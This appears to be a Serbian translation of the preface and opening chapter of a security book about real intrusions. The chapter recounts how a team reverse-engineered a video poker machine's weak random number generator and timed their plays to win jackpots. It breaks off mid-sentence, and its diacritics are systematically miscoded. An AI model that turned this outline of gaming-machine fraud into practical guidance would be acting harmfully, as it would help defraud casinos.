You are on page 1of 53

Predgovor

Hakeri – klinci i oni ne tako mladi – neprestano se nadmeñu meœu


sobom. Svakako bi se “proslavio” onaj ko bi se mogao pohvaliti upadom
u Web prezentaciju moje kompanije za bezbednost, ili u moj liåni sistem.
Zadovoàstvo bi im priåinilo i ako bi uspeli da izmisle priåu o upadu u
neki sistem i predstave je meni i koautoru ove kçige, Bilu Sajmonu, tako
uveràivo da nas ona ponese, da poverujemo u çu i ukàuåimo je u kçigu.
To je pred nas dvojicu postavilo fascinirajuñi izazov, borbu umova
koja se odvijala svaki put kada smo vodili razgovore za ovu kçigu. Veñi-
na novinara i pisaca lako utvrœuje autentiånost izjave. Da li je osoba s
kojom razgovaraju zaista osoba za koju se predstavàa? Da li ta osoba je-
ste ili je bila na poloæaju koji navodi? Da li ta osoba radi ili je radila za
navedenu organizaciju? Da li ta osoba ima dokumenta kojima bi pot-
krepila priåu, i moæe li se utvrditi da su ta dokumenta vaàana? Postoje li
pouzdani àudi koji ñe podræati priåu ili neke çene delove?
Ali, iskrenost hakera malo je teæe proveriti. Veñina àudi åije se priåe
nalaze u ovoj kçizi, osim nekoliko çih koji su veñ bili u zatvoru, bili bi
sudski goçeni ako bi çihov pravi identitet bio utvrœen. Zbog toga je
malo verovatno da ñe vam oni otkriti svoja prava imena kao dokaz.
Ispriåali su mi svoje priåe samo zato ãto mi veruju. Znaju da sam bio
u zatvoru, i oslaçaju se na to da ih neñu izdati i dovesti u situaciju u ko-
joj sam i sâm bio. Uprkos rizicima, mnogi od çih su ponudili opipàive
dokaze svojih upada.
Naravno, moguñe je – zapravo, verovatno je – da su neki i preuve-
liåali svoje “uspehe”, dodajuñi priåama detaàe koji ih åine zanimài-
vijim, ili da su razvili potpuno izmiãàene priåe, ali su ih zasnovali na
ostvarivim podvizima, tako da zvuåe istinito.
Zbog tih rizika, åvrsto smo se pridræavali visokih standarda pouzda-
nosti. U svim razgovorima ispitivao sam svaki tehniåki detaà, traæio de-
taàna objaãçeça svega ãto nije zvuåalo verodostojno, a ponekad sam se

ix
kasnije vrañao na istu priåu da bih video da li je i daàe ista, ili ñe sago-
vornik neãto izmeniti. Sumçu su budile osobe koje “nisu mogle da se
sete” kako su izvele neki teæak korak i izostavile ga iz priåe. Takoœe, ni-
sam verovao osobama koje nisu izgledale kao da znaju dovoàno da bi
uradile ono ãto tvrde da jesu, ili nisu mogle da objasne kako su stigle od
taåke A do taåke B.
Osim tamo gde je izriåito navedeno drugaåije, sve glavne priåe u
ovoj kçizi poloæile su moj test verovatnoñe. Bil i ja smo se sloæili oko
uveràivosti svake osobe åija je priåa ukàuåena u kçigu. Meœutim, de-
taàe smo åesto meçali da bismo zaãtitili i hakera i ærtvu.
x U isto vreme, poãto kompanije koje prave softver i hardver stalno
otklaçaçu bezbednosne propuste pomoñu zakrpa i novih verzija proiz-
Umeñe provale

voda, samo joã neki podvizi opisani u kçizi i daàe imaju isti efekat. Pre-
viãe samopouzdan åitalac mogao bi pomisliti da nema o åemu da brine –
poãto ñe nedostaci biti otkloçeni ili veñ jesu, on ili çegova kompanija
nemaju åega da se plaãe. Meœutim, lekcija koju treba da nauåite iz ovih
priåa jeste da hakeri pronalaze nove slabosti svaki dan. Proåitajte kçigu
– ne da biste saznali pojedinaåne nedostatke pojedinaånih proizvoda,
veñ da biste promenili svoje stavove i postali odluåniji.
Proåitajte je i da biste se zabavili, i poåeli da boàe shvatate iznenaœu-
juñe podvige ovih opasno veãtih hakera.
Neke priåe su ãokantne, neke ñe vam otvoriti oåi, a u nekima ñete se
nasmejati inspiraciji i drskosti hakera. Ukoliko se bavite informacionim
tehnologijama ili bezbednoãñu, iz svake priåe saznañete kako da svoju
organizaciju uåinite sigurnijom. Ako niste tehniåki nastrojeni, ali volite
kriminalistiåke priåe, pune drskosti, rizika i hrabrosti, sve to ñete pro-
nañi u ovoj kçizi.
Svaka opisana avantura suoåava se sa opasnoãñu nailaska na vrata iza
kojih, sa spremnim lisicama, åeka åitava potera policajaca, FBI agenata i
tipova iz tajne sluæbe. U mnogim sluåajevima, upravo to se i desilo.
Za one ostale, ta moguñnost i daàe postoji. Nije ni åudo ãto neki od
ovih hakera nikada ranije nisu hteli da ispriåaju svoje avanture. Veñina
onih o kojima ñete åitati u ovoj kçizi objavàena je po prvi put.
Poglavlje 1
Hakerisanjem kazina
do milion dolara
Kad god [neki programer] kaæe: “Niko se neñe muåiti oko toga”, naœe
se klinac u Finskoj raspoloæen da se pomuåi.
– Aleks Mejfild

U æivotu svakog kockara doœe magiåan trenutak kad jednostavna


uzbuœeça prerastu u 3D fantazije – momenat kada pohlepa
proguta etiku, a sistem kazina postane samo joã jedna planina
koja åeka da bude osvojena. U tom trenutku, maãtaçe o proverenom
naåinu da se pobede stolovi ili maãine oduzima dah.
Aleks Mejfild i çegova tri druga nisu samo saçarili. Kao i mnogi
drugi upadi, i ovaj je poåeo kao veæba inteligencije, provera da li je
neãto moguñe. Na kraju, çih åetvorica su pobedili sistem i olakãali ka-
zina za “oko milion dolara”, priåa Aleks.
Ranih devedesetih, åetiri prijateàa su radila kao savetnici za visoke
tehnologije i æiveli opuãteno i nonãalantno. “Znate veñ – radite, zaradi-
te neke pare, a onda ne radite dok ne ostanete ãvorc.”
Las Vegas je bio daleko – dekor za snimaçe filmova i TV serija.
Upravo zato, kada je firma za razvoj tehnologije ponudila momcima
zadatak da naprave softver i isprate ga na tamoãçu konvenciju o viso-
koj tehnologiji, oni su ponudu oberuåke prihvatili. To bi im bila prva
poseta Vegasu, ãansa da i sami vide bàeãtava svetla, i to s plañenim troã-
kovima. Ko bi to odbio? Zasebni apartmani u velikom hotelu znaåili su
da zabavi mogu da se pridruæe i Aleksova supruga i Majkova devojka.
Dva para, plus Lari i Marko, otisnuli su se put vrelog Grada greha.

1
Aleks kaæe da nisu znali mnogo o kockaçu niti o tome ãta da oåeku-
ju. “Izaœete iz aviona, a svuda oko vas starije gospoœe igraju na slot maãi-
nama. Sve to izgleda smeãno i ironiåno, i uvuåe vam se u svaku poru.”
Poãto su zavrãili posao na sajmu, åetiri prijateàa i dve dame otiãli su
u kazino u svom hotelu, igrali na slot maãinama i uæivali u besplatnim
pivima, kada je Aleksova supruga pred çih postavila izazov.
Zar ove maãine nisu zasnovane na raåunarima? Momci, vi se
time bavite, zar ne moæete da uåinite neãto da bismo osvojili
viãe novca?
2
Drugari su se preselili u Majkov apartman i poåeli da izbacuju pi-
taça i postavàaju teorije o naåinu na koji aparati rade.
Umeñe provale

Istraæivaçe
To je bio okidaå. “Sve to nas je zainteresovalo i, po povratku kuñi, poåeli
smo da ispitujemo stvar”, priåa Aleks, oæivàavajuñi señaça na kreativnu
fazu. Vrlo brzo, istraæivaçe je podræalo ono ãto su veñ pretpostavàali.
“Da, to su u osnovi raåunarski programi. Zanimalo nas je postoji li
naåin da provalimo te maãine?”
Neki àudi su pobedili slot maãine tako ãto su “zamenili firmver” – u
maãinu bi ubacili kompjuterski åip i program zamenili drugim koji bi
omoguñio atraktivnije isplate nego ãto je kazino predvideo. Mada su
drugi timovi to radili, åinilo se da takva akcija zahteva dogovor s rad-
nikom kazina, i to ne sa bilo kojim radnikom, veñ s tehniåarem
zaduæenim za slot maãine. Za Aleksa i çegove ortake “zameçivaçe
ROM-ova bilo je kao tresnuti baku po glavi i oteti joj taãnu”. Zakàuåili
su da bi se u sve to upuãtali samo ako bi cela akcija bila izazov za çihove
programerske veãtine i intelekt. Povrh svega, oni nisu bili naroåito ta-
lentovani za laæno predstavàaçe (engl. social egineering). Bavili su se
raåunarima, ali nisu znali kako da priœu zaposlenom u kazinu i predloæe
da im se pridruæi u maçoj prevari kojom ñe uzeti neãto tuœeg novca.
Ali kako ñe reãiti problem? Aleks je objasnio:
Pitali smo se da li bismo mogli predvideti sekvencu karata. Ili,
da li moæda postoje zadça vrata [programski kôd koji omo-
guñava kasniji neovlaãñen pristup programu], koja je neki pro-
gramer napravio radi sopstvene koristi. Sve programe su pisali
programeri, a oni su vragolasti stvorovi. Pomislili smo da
bismo mogli nabasati na zadça vrata, na primer tako ãto
ñemo pritisnuti odreœenu sekvencu dugmadi i tako promeniti
verovatnoñu dobitka, ili sami programirati pukotinu koju
bismo mogli da iskoristimo.
Aleks je proåitao kçigu The Eudaemonic Pie Tomasa Basa (Thomas
Bass) (Penguin, 1992), priåu o grupi momaka koji su se bavili raåunari-
ma i fizikom. Oni su osamdesetih pobedili rulet u Las Vegasu koristeñi
sopstvenu verziju “prenosivog” raåunara, veliåine pakle cigareta, koji je
predviœao rezultat na ruletu. Jedan ålan tima za stolom pritiskao je dug- 3
mad unoseñi brzinu toåka ruleta i naåin rotiraça kuglice. Raåunar je
radio-talasima prenosio tonove u sluãni aparat drugog ålana tima koji je

Poglavlje 1: Hakerisanjem kazina do milion dolara


tumaåio signal i kladio se na odgovarajuñi broj. Oåekivali biste da su
odneli tonu novca, ali nisu. Po Aleksovom miãàeçu, “Njihova ãema je
imala ogroman potencijal, ali je bila sputana nezgrapnom i nepouzda-
nom tehnologijom. Takoœe, bilo je previãe uåesnika, pa su problem
predstavàali i ponaãaçe i meœusobni odnosi. Mi smo reãili da ne pono-
vimo çihove greãke.”
Aleks je zakàuåio da bi bilo lakãe pobediti igru zasnovanu na raåu-
naru “jer su raåunari potpuno predvidivi” – rezultat zavisi od onoga ãto
se prethodno desilo, ili, da parafraziramo staru izreku vezanu za laæno
predstavàaçe, ubaciã dobre podatke, dobijeã dobre podatke. (Origi-
nalan izraz na ovo gleda iz negativne perspektive: “ubaciã œubre, dobijeã
œubre”.)
To mu je savrãeno odgovaralo. Kao mladiñ, Aleks je bio muziåar, svi-
rao je u kultnom bendu i saçao o tome da postane rok zvezda, a kada
to nije uspelo, prebacio se na prouåavaçe matematike. Imao je talenta
za matematiku i, mada nikada nije mario za ãkole (napustio je koledæ),
nastavio je da se bavi tom temom sve dok nije stekao solidan nivo
znaça.
Poãto je zakàuåio da je istraæivaçe neophodno, otputovao je u
Vaãington i proveo neko vreme prouåavajuñi dokumentaciju u zavodu
za patente. “Pomislio sam da je neko moæda bio dovoàno glup da sav
kôd ubaci u patent” za videopoker aparat. I naravno, bio je u pravu. “U
to vreme, strpati gomilu objektnog koda u patent bio je naåin da pod-
nosilac patenta zaãtiti svoj izum, jer kôd sadræi detaàan opis izuma, ali u
obliku koji nije naroåito razumàiv korisnicima. Uzeo sam mikrofilm sa
objektnim kodom i pregledao strane pune heksadecimalnih brojeva
traæeñi zanimàive odeàke, koji su morali biti pretvoreni [u upotrebàiv
oblik]”.
Analiziraçe koda otkrilo je nekoliko tajni koje su zaintrigirale tim,
ali su zakàuåili da se, ukoliko bi da odmaknu daàe, moraju doåepati
konkretne maãine koju hoñe da hakeriãu, i sami pogledaju kôd.
Njih åetvorica su åinili dobro usklaœen tim. Majk je bio viãe nego
kompetentan programer, i znao je viãe o hardveru nego ostala trojica.
Marko, joã jedan bistar programer, bio je emigrant iz Istoåne Evrope ti-
nejdæerskog izgleda. Ali, bio je priliåno smeo pametçakoviñ koji je
4 svemu prilazio sa stavom “mogu ja to”. Aleks je bio odliåan programer i
doprineo je svojim poznavaçem ãifrovaça. Lari nije bio naroåito dobar
Umeñe provale

programer, a zbog udesa s motorom nije mogao mnogo da putuje.


Meœutim, on je bio odliåan organizator koji je usmeravao projekat i vo-
dio raåuna da se svi fokusiraju na ono ãto u odreœenoj fazi treba obaviti.
Posle poåetnih istraæivaça, Aleks je “zaboravio” na projekat. Ali
Marko se zagrejao za ideju. Nastavio je da insistira: “Nije to nikakav
problem, maãine se mogu legalno kupiti u trinaest dræava”. Na kraju je
uspeo da ubedi ostale da pokuãaju. “Pomislili smo, ãto da ne.” Uspeli su
da izdvoje dovoàno novca za put i kupovaçe maãine. Ponovo su se
uputili u Vegas – ovaj put o svom troãku i s drugim ciàem na pameti.
Aleks priåa: “Da biste kupili slot maãinu, trebalo je samo da uœete u
radçu i pokaæete liånu ispravu iz dræave u kojoj takvu maãinu moæete
legalno posedovati. Ukoliko ste imali vozaåku dozvolu iz neke od tih
dræava, niko vas nije previãe ispitivao.” Jedan od çih je imao zgodnu
vezu sa stanovnikom dræave Nevada. “Bio je to ujak neåije devojke, ili
tako neãto, i on je æiveo u Vegasu.”
Odluåili su da Majk razgovara s tim åovekom jer “ima dræaçe trgov-
ca i vrlo je reprezentativan tip. Pretpostavàa se da ñete maãinu koristiti
za nelegalno kockaçe. Isto kao sa oruæjem”, Aleks je objasnio. Mnogo
maãina je dospevalo na “sivo træiãte” – prodavano je van dozvoàenih ka-
nala klubovima i sliånim mestima. Ipak, iznenadilo ga je ãto su mogli
da kupe “potpuno isti aparat kao ãto su oni u kazinu”.
Majk je åoveku dao 1.500 dolara za maãinu japanske proizvodçe.
“Onda smo nas dvojica utovarili prokletiçu u kola. Vozili smo kuñi kao
da na zadçem sediãtu imamo bebu.”
Razvijaçe upada
Majk, Aleks i Marko su odteglili aparat uz stepenice, na drugi sprat
kuñe u kojoj su mogli da koriste slobodnu spavañu sobu. Ovo iskustvo
je Aleks dugo pamtio kao jedno od najveñih uzbuœeça u svom æivotu.
Otvorili smo je, izvadili ROM i utvrdili koji je to procesor. Ja
sam odluåio da uzmemo japansku maãinu koja je izgledala
kao imitacija jedne poznate marke. Pomislio sam da su
inæeçeri moæda bili pod veñim pritiskom, pa su bili leçi ili
malo nemarniji.
5
Ispostavilo se da sam bio u pravu. Koristili su [åip] 6809,
sliåan åipu 6502 koji ste mogli nañi u raåunaru Apple II ili

Poglavlje 1: Hakerisanjem kazina do milion dolara


Atari. Bio je to 8-bitni åip s memorijom od 64K. Poãto sam
programirao na asemblerskim jezicima, bio mi je poznat.
Aparat koji je Aleks odabrao koristio se veñ desetak godina. Kad god
kazino hoñe da kupi maãinu novog dizajna, Komisija za kockaçe (Las
Vegas Gaming Commission) mora da prouåi program i pobrine se da
on bude takav da isplate igraåima budu poãtene. Odobravaçe novog
dizajna moæe potrajati, pa kazina zadræavaju stare aparate duæe nego ãto
biste oåekivali. Åinilo se da ñe starija maãina verovatno sadræati preva-
ziœenu tehnologiju i tim se nadao da ñe je lakãe napasti.
Raåunarski kôd koji su preuzeli sa åipa bio je u binarnom obliku –
niz jedinica i nula koje predstavàaju osnovni nivo kompjuterskih uput-
stava. Da bi ih preveli u oblik s kojim bi mogli da rade, prvo su morali
da se pozabave reverznim inæeçeringom (engl. reverse engineering) –
procesom kojim inæeçer ili programer utvrœuje kako je postojeñi proiz-
vod projektovan. U ovom primeru, to je znaåilo prevoœeçe jezika maãi-
ne u kôd koji su momci mogli da razumeju i s kojim su mogli da rade.
Aleksu je trebao “disasembler” za prevoœeçe koda. Åetvorka nije
htela da izazove sumçu kupovinom programa – to bi bilo kao da su
otiãli u biblioteku i pozajmili kçige o pravàeçu bombe. Sami su napi-
sali disasembler, a Aleks taj posao opisuje kao “ne baã prost ko pasuà, ali
zabavan i relativno lak”.
Poãto su kôd iz poker aparata propustili kroz novi disasembler, tri
programera su sela i poåela da prolivaju znoj nad çim. Viåan projek-
tant softvera obiåno brzo pronalazi delove programa na koje hoñe da se
usredsredi. To je zato ãto osoba koja piãe kôd svud po çemu ostavàa
saobrañajne znake – napomene, komentare i primedbe koji objaãçava-
ju funkciju svakog dela koda, sliåno kao ãto kçiga ima naslove delova,
poglavàa, i podnaslove odeàaka unutar poglavàa.
Kada se program prevede u oblik koji maãina moæe da proåita, ti sao-
brañajni znaci se ignoriãu – raåunaru ili mikroprocesoru oni ne trebaju.
Zbog toga, kodu dobijenom ovakvom analizom nedostaju ta korisna
objaãçeça. Da se opet posluæimo metaforom “saobrañajnih znakova” –
ovako dobijen kôd liåi na mapu bez imena mesta, bez oznaka autopute-
va ili ulica.
6 Pregledali su strane koda na ekranu traæeñi odgovore na osnovna pi-
taça: “Koja logika je primeçena? Kako se karte meãaju? Kako se biraju
Umeñe provale

karte za zamenu?” Ipak, u tom trenutku najvaænije im je bilo da


pronaœu kôd “generatora sluåajnih brojeva” (engl. random number gene-
rator). Aleks je ispravno pretpostavio da su japanski programeri koristili
preåice koje su ostavile greãke u kodu generatora sluåajnih brojeva. Za-
ista su ih koristili.

Ponovno pisaçe koda


Aleks ponosno opisuje svoj trud. “Bili smo programeri i bili smo dobri u
onome ãto smo radili. Shvatili smo kako se brojevi u kodu pretvaraju u
karte na maãini i napisali smo kôd na jeziku C koji ñe raditi isto”,
ispriåao je.
Imali smo motivaciju i non-stop smo radili. Mislim da nam je
trebalo dve ili tri nedeàe da doœemo do taåke kada smo zaista
znali ãta se deãava u kodu.
Pogledaã kôd, pretpostaviã åemu sluæi, napiãeã nov kôd, baciã
ga na ROM [raåunarski åip], vratiã u aparat i gledaã ãta se
deãava. Pisali smo rutine koje na ekranu preko karata ispisuju
heksadecimalne brojeve. Tako smo dobili neku vrstu pregleda
naåina na koji kôd deli karte.
Bila je to kombinacija pokuãaja i greãaka i dubinske analize.
Kôd je vrlo brzo poåeo da poprima smisao. Gotovo precizno
smo shvatili kako se brojevi u raåunaru pretvaraju u karte na
ekranu.
Nadali smo se da je generator sluåajnih brojeva bio relativno
jednostavan. A ranih devedesetih bio je upravo takav. Malo
sam istraæivao i otkrio da je zasnovan na neåemu ãto je
Donald Knut napisao joã ãezdesetih. Ti tipovi nisu niãta izmi-
slili, samo su iskoristili postojeñe istraæivaçe metoda iz Monte
Karla i sliånih stvari, i ubacili ga u svoj kôd.
Otkrili smo taåan algoritam koji su koristili za generisaçe
karata. Zove se linearni pomiåni registar sa povratnom vezom
(engl. linear feedback shift register, LFSR) i priliåno je dobar
generator sluåajnih brojeva. 7

Meœutim, uskoro su otkrili da ovaj generator ima fatalnu greãku

Poglavlje 1: Hakerisanjem kazina do milion dolara


koja im je mnogo olakãala posao. Majk je objasnio da je to bio “relativ-
no jednostavan 32-bitni generator sluåajnih brojeva, pa je bilo moguñe
dostiñi sloæenost izraåunavaça potrebnu za çegovo provaàivaçe, a uz
nekoliko dobrih optimizacija stvar je postala gotovo trivijalna”.
Znaåi, dobijeni brojevi nisu bili zaista nasumiåni. Aleks smatra da
postoji dobar razlog zaãto je moralo biti tako.
Ukoliko bi brojevi zaista bili nasumiåni, ne biste mogli pode-
siti kvote. Ne bi mogli da se procene izgledi. Neki aparati uza-
stopno daju fleã rojale. A oni ne bi trebali uopãte da se
pojavàuju. Zbog toga projektanti æele moguñnost provere
ispravnosti statistike, inaåe imaju oseñaj da ne kontroliãu igru.
Druga stvar koju projektanti nisu shvatili kada su napravili
ovaj aparat, jeste to da im ne treba samo generator sluåajnih
brojeva. Statistiåki u svakom deàeçu ima deset karata – pet
koje se vide na poåetku, i po jedna zamena za svaku od poået-
nih karata koja ñe se pojaviti ukoliko igraå odluåi da je odbaci.
Ispostavilo se da su rane verzije aparata tih deset karata uzi-
male iz deset sekvencijalnih nasumiånih brojeva u generatoru
sluåajnih brojeva.
Tako su Aleks i çegovi partneri shvatili da su programske instrukcije
ovih starijih maãina loãe smiãàene. A zbog tih greãaka videli su da mogu
napisati relativno jednostavan, ali elegantan i domiãàat algoritam kojim
ñe pobediti maãinu.
Aleks je primetio da je trik u tome da poånete igru, vidite koje su
karte prikazane na maãini, i unesete podatke za identifikovaçe tih kara-
ta u raåunar kod kuñe. Algoritam ñe izraåunati gde je generator sluåaj-
nih brojeva bio i kroz koliko brojeva treba da proœe pre nego ãto bude
spreman da prikaæe æeàene karte – fleã rojal.
Seli smo za naã aparat, pokrenuli svoj programåiñ i on nam je
taåno rekao koja ñe biti sledeña sekvenca karata. Bili smo pri-
liåno uzbuœeni.
To uzbuœeçe Aleks je pripisao oseñaçu “da ste pametniji od nekoga
8
i znate da ga moæete pobediti. A to ñe, u naãem sluåaju, doneti i novac”.
Otiãli su u kupovinu i pronaãli ruåni sat marke Casio s funkcijom
Umeñe provale

odbrojavaça koja se moæe podesiti na desetine sekunde. Kupili su tri


sata, po jedan za svakog ålana koji ñe iñi u kazina. Lari ñe ostati u bazi i
odræavati raåunar.
Bili su spremni za testiraçe metode. Jedan ålan tima bi poåeo da
igra i javio bi koje je karte dobio – broj i boju svih pet karata. Lari bi
uneo podatke u çihov raåunar. Mada je çegova marka bila maçe po-
znata, bio je to popularan raåunar kod zaluœenika i odliåan izbor za ovu
namenu, jer je imao mnogo bræi åip od onog u japanskom poker apara-
tu. Trebalo mu je samo nekoliko trenutaka da izraåuna taåno vreme za
odbrojavaçe koje treba podesiti na Casio satu.
Kada se sat oglasi, igraå na slot maãini treba da pritisne dugme Play.
Ali, to je morao uraditi u deliñu sekunde. Aleks objaãaçava da to i nije
bio toliko veliki problem kako se moæda åini.
Nas dvojica smo neko vreme bili muziåari. Kada ste muziåar i
imate dovoàno oseñaja za ritam, moæete pritisnuti dugme s
kaãçeçem maçim od pet milisekundi.
Ukoliko sve bude radilo kao ãto je planirano, aparat ñe prikazati
traæeni fleã rojal.
Veæbali su na svom aparatu dok svi nisu uspeli da otvore fleã rojal na-
kon prihvatàivog broja pokuãaja.
U prethodnim mesecima, po Majkovoj priåi, oni su “izdvojili pro-
gramski kôd aparata, precizno utvrdili kako se sluåajni brojevi pre-
tvaraju u karte na ekranu, taåno odredili kada i koliko brzo generator
sluåajnih brojeva pravi petàu, nauåili sve bitne specifiånosti maãine i
razvili program koji ñe sve te promenàive uzimati u obzir. Kada vam je
poznato staçe pojedinaåne maãine u odreœenom trenutku, s visokom
preciznoãñu moæete predvideti ponavàaçe sluåajnih brojeva u bilo kom
trenutku u sledeñih nekoliko sati, pa åak i dana”.
Pobedili su maãinu – pretvorili je u svog roba. Prihvatili su intelek-
tualni izazov koji je upad postavio i pobedili su. Znaçe je moglo da ih
uåini bogataãima.
Bilo je lepo saçariti o tome. Ali, da li su zaista mogli da izvedu ak-
ciju u dæungli kazina?
9

Povratak u kazina – ovaj put radi igre

Poglavlje 1: Hakerisanjem kazina do milion dolara


Jedna je stvar privatno petàati oko svog aparata, na bezbednoj lokaciji.
Sesti usred prepunog kazina i ukrasti novac – to je potpuno druga priåa.
Za to su potrebni åeliåni æivci.
Njihove dame su mislile da putuju samo radi zabave. Momci su ih
ohrabrili da obuku uske sukçice i upadàivo se ponaãaju – kockaju se,
priåaju, kikoñu, naruåuju piña – nadajuñi se da ñe àudi iz obezbeœeça
koji upravàaju kamerama biti ometeni lepim licima i oblinama. “Zato
smo insistirali na tome ãto smo viãe mogli”, seña se Aleks.
Nadali su se da ñe se uklopiti, stopiti s masom. “Majk je bio najboài.
Bio je proñelav, i on i çegova supruga su izgledali kao tipiåni igraåi.”
Aleks opisuje scenu kao da se sve desilo juåe. Marko i Majk su akciju
opisali malo drugaåije, ali evo kako je sve izgledalo Aleksu. Sa svojom su-
prugom Eni prvo je obiãao kazino i odabrao jedan video poker aparat.
Morao je s velikom preciznoãñu znati taåan ciklus maãine. Jedna metoda
koju su koristili bila je da video kameru stave u torbicu. U kazinu bi
igraå postavo torbicu tako da objektiv kamere bude usmeren na ekran
poker aparata i dræao je neko vreme ukàuåenu. “Bilo je nezgodno”, seña
se, “postaviti torbu na odgovarajuñe mesto, a pri tom ne izgledati kao da
je poloæaj torbe bitan. Prosto, ne æelite da uradite niãta ãto bi delovalo
sumçivo i privlaåilo paæçu.” Majk je viãe voleo drugu metodu, koja je
bila maçe zahtevna: “Ciklus ponavàaça brojeva na nepoznatom apara-
tu izraåunavali smo pomoñu dva oåitavaça karata sa ekrana, u razmaku
od viãe sati.” Morao je biti siguran da na maãini u meœuvremenu niko
nije igrao jer bi se time promenila brzina ponavàaça, ali to je bilo lako:
samo je trebalo da proveri da li su na ekranu prikazane karte koje je
ostavio kada je posledçi put igrao na maãini, a to je obiåno bio sluåaj jer
se na “maãinama s visokim ulozima ne igra åesto”.
Nakon drugog uåitavaça prikazanih karata, podesio bi odbrojavaçe
na Casio satu, a potom bi telefonom javio Lariju podatke o vremenu i
sekvencama karata. Lari bi ih uneo u çihov raåunar i pokrenuo program.
Na osnovu tih podataka, raåunar bi predvideo vreme sledeñeg fleã rojala.
“Nadate se da ñe se to desiti u roku od nekoliko sati, ali ponekad je treba-
lo da proœe nekoliko dana”, pa bi u tom sluåaju pokuãali s drugim apara-
tom, åesto u drugom hotelu. Podeãeno vreme na Casio satu moglo bi biti
10 promaãeno i za oko minut, ali ipak je bilo dovoàno precizno.
Aleks i Eni su se u kazino vrañali dosta ranije u sluåaju da je neko seo
Umeñe provale

za aparat koji oni æele, i igrali na drugim aparatima dok çihov ne bude
slobodan. Aleks bi seo za ciàni aparat, a Eni za aparat do çega. Poåeli bi
da igraju i trudili se da izgledaju kao da se zabavàaju. A onda:
Ja bih poåeo da igram, podeãavajuñi tajmer na ruånom satu.
Zapamtio bih podeàene karte – vrednost i boju svih pet
karata, a potom nastavio da igram sve dok ne zapamtim osam
karata u sekvenci. Klimnuo bih svojoj æeni kao znak da odla-
zim i krenuo ka zakloçenijoj javnoj govornici izvan dvorane
kazina. Imao sam oko osam minuta da odem do telefona, oba-
vim ãta sam morao i vratim se za aparat. Moja æena je nasta-
vàala da igra. Ukoliko bi neko hteo da koristi moj aparat, ona
bi mu rekla da tu sedi çen suprug.
Smislili smo naåin da pozovemo Larijev broj pejdæera i da
preko brojeva na tastaturi telefona unesemo karte. Tako nismo
morali da izgovaramo oznake karata – àudi iz kazina uvek
osluãkuju takve stvari. Lari bi ponovo uneo karte u raåunar i
pokrenuo program.
Potom bih ga pozvao. On bi sluãalicu dræao iznad raåunara
koji bi dao dva kratka zvuåna signala. Kada bih åuo prvi
zvuk, pritisnuo bih pauzu na brojaåu sata i zaustavio odbro-
javaçe. Kada bih åuo drugi zvuk, ponovo bih pritisnuo
pauzu da bih restartovao brojaå.
Karte koje je Aleks javàao govorile su raåunaru taåan poloæaj na kom
je bio generator sluåajnih brojeva poker aparata. Unoãeçem kaãçeça
koje je odredio raåunar, Aleks je unosio kàuånu ispravku u brojaå svog
Casio sata tako da se on oglasi taåno u trenutku kada ñe se pojaviti fleã
rojal.
Poãto bih restartovao brojaå sata, vrañao sam se aparatu. Kada
bi se brojaå oglasio sa “bip, bip, bum” – baã tada, u trenutku
tog “bum”, ponovo bih pritisnuo dugme Play na aparatu.
U tom prvom pokuãaju mislim da sam osvojio 35.000 dolara.
11
Doãli smo do oko 30 ili 40 procenata uspeãnosti jer je sve bilo
dobro razraœeno. Nismo uspevali samo kada bismo uneli

Poglavlje 1: Hakerisanjem kazina do milion dolara


pogreãno vreme.
Kada je prvi put osvojio novac, Aleks je bio “veoma uzbuœen, ali
uplaãen. Nadzornik stolova je bio neki namrgoœeni Italijan. Bio sam si-
guran da me åudno gleda, sa zbuçenim izrazom lica, moæda zato ãto
sam stalno telefonirao. Mislim da je otiãao da presluãa trake.” Uprkos
napetosti, imalo je to “svojih åari”. Majk se priseña: “Naravno, bio sam
nervozan jer je neko mogao da primeti moje sumçivo ponaãaçe, ali za-
pravo, niko me nije åudno gledao. Mene i moju suprugu tretirali su kao
i druge dobitnike visokih uloga – åestitali su nam i davali poklone.”
Bili su toliko uspeãni da su morali voditi raåuna o tome da ne osvoje
previãe novca i ne privuku paæçu na sebe. Suoåili su se s retkim proble-
mom prevelikog uspeha. “Sve je bilo vrlo javno. Osvajali smo ogromne
dæek potove u desetinama hiàada dolara. Fleã rojal ima kvotu 4000 pre-
ma 1. Na aparatu u koji se ubacuje 5 dolara, to je dvadeset hiàada.”
Cifre su i veñe. Neke igre su progresivne – glavni zgoditak raste sve
dok ga neko ne osvoji, a ovi momci su mogli i çih lako da dobiju.
Osvojio sam jedan koji mi je doneo 45 hiàada. Priãao mi je teh-
niåar sa ãirokim pojasom – on verovatno i popravàa maãine. Taj
åovek ima poseban kàuå koji nemaju àudi ãto rade u dvorani.
Otvori kuñiãte, izvadi [elektronsku] ploåu, izvadi ROM åip
pred vama. Sa sobom nosi åitaå ROM-a i testira åip iz maãine
poredeñi ga sa zlatnim masterom koji se åuva pod kàuåem.
Aleks je saznao da je provera ROM-a standardna procedura veñ viãe
godina. Pretpostavàa da su ih “dosad dosta ispaàivali”, pa su najzad ot-
krili kako da izvedu proveru ROM-a kao protivmeru.
Aleksova izjava me je navela da se zapitam da li kazina obavàaju ove
provere jer su neki tipovi koje sam sreo u zatvoru zameçivali firmver.
Pitao sam se kako su to mogli tako brzo da obave i izbegnu otkrivaçe.
Aleks smatra da je tajna u laænom predstavàaçu – sigurno su se dogo-
vorili sa obezbeœeçem i potplatili nekog u kazinu. On je pretpostavàao
da su moæda zamenili i zlatni master s kojim se poredi åip iz aparata.
Aleks ostaje pri tome da je lepota upada koji je obavio çegov tim
12 bila je u tome ãto nisu morali da meçaju firmver. A smatrali su da je
çihov pristup bio i mnogo veñi izazov.
Umeñe provale

Tim nije smeo da nastavi da osvaja toliko novca. “Bilo je jasno da ñe


neko sabrati dva i dva i reñi: ’Ovog tipa sam veñ negde video‘. Uplaãili
smo se da ñe nas uhvatiti.”
Pored stalno prisutnih briga da ñe biti uhvañeni, morali su se pozaba-
viti i pitaçem poreza. Za svaki dobitak preko 1.200 dolara, kazino traæi
liåna dokumenta i isplatu prijavàuje poreskoj sluæbi. Majk kaæe: “Pret-
postavàali smo da ñe, ukoliko igraå ne dâ liånu kartu, porez biti odbijen
od dobitka, ali nismo hteli da privlaåimo paæçu otkrivajuñi da li je ta
pretpostavka taåna.” Plañaçe poreza “nije bilo veliki problem”, ali “ono
ostavàa podatke koji govore da osvajate nenormalne koliåine novca.
Zbog toga se mnogo planiraça odnosilo na pronalaæeçe naåina da
ostanemo u potaji.”
Morali su da smisle drugaåiji pristup. Nakon krañeg vremena telefo-
niraça kuñi, rodila se nova ideja.

Nov pristup
Ovaj put momci su imali dva ciàa: razvijaçe metode koja bi im
